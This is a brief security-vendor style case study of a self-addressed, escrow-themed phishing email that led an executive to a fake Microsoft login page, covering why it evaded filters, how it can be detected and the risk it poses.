Executive Targeted in a Self-Addressed Escrow-Themed Credential Phishing Attack
In this attack, a company executive was asked to review a supposed escrow letter and fully executed contract for an apparent real estate transaction attached to the email. The email opens with the salutation “Dear All”, potentially used to appear as if the email was sent to multiple recipients. The sending email address was spoofed to be identical to the recipient’s address and, rather than including a sender’s name, the display name also matched the recipient’s email address. The filename of the attached HTML file started “Completion statement” and ended with a reference to the recipient’s company.
Upon opening the attachment, a phishing page mimicking a Microsoft login page, which pre-populated the recipient’s email address, would have been presented to the target, with the presumption that they needed to authenticate their identity to view the documents.
Why It Bypassed Traditional Security
Traditional tools that use known bad indicators cannot detect the URL in the attachment because it is unknown. The spoofed domain did not have an effective DMARC policy in place to reject any unauthorized senders that attempt to send emails from an address on the domain.
Detecting the Attack
HTML attachments are commonly used to deliver phishing payloads without having to include the malicious content in the email itself. An analysis of the HTML file identified a URL that had not been previously detected as malicious. The sending and receiving email addresses in this email appeared to be identical, which is an indicator that this message is potentially malicious. A holistic detection system that is able to extract and analyze URLs from email attachments is required to assess the intent of any links, alongside other signals acquired through content analysis, to determine whether the email is malicious.
Risk to Organization
When an employee enters their credentials, attackers gain access to their email account, which they can use to search for sensitive information or launch attacks on coworkers, customers, and vendors.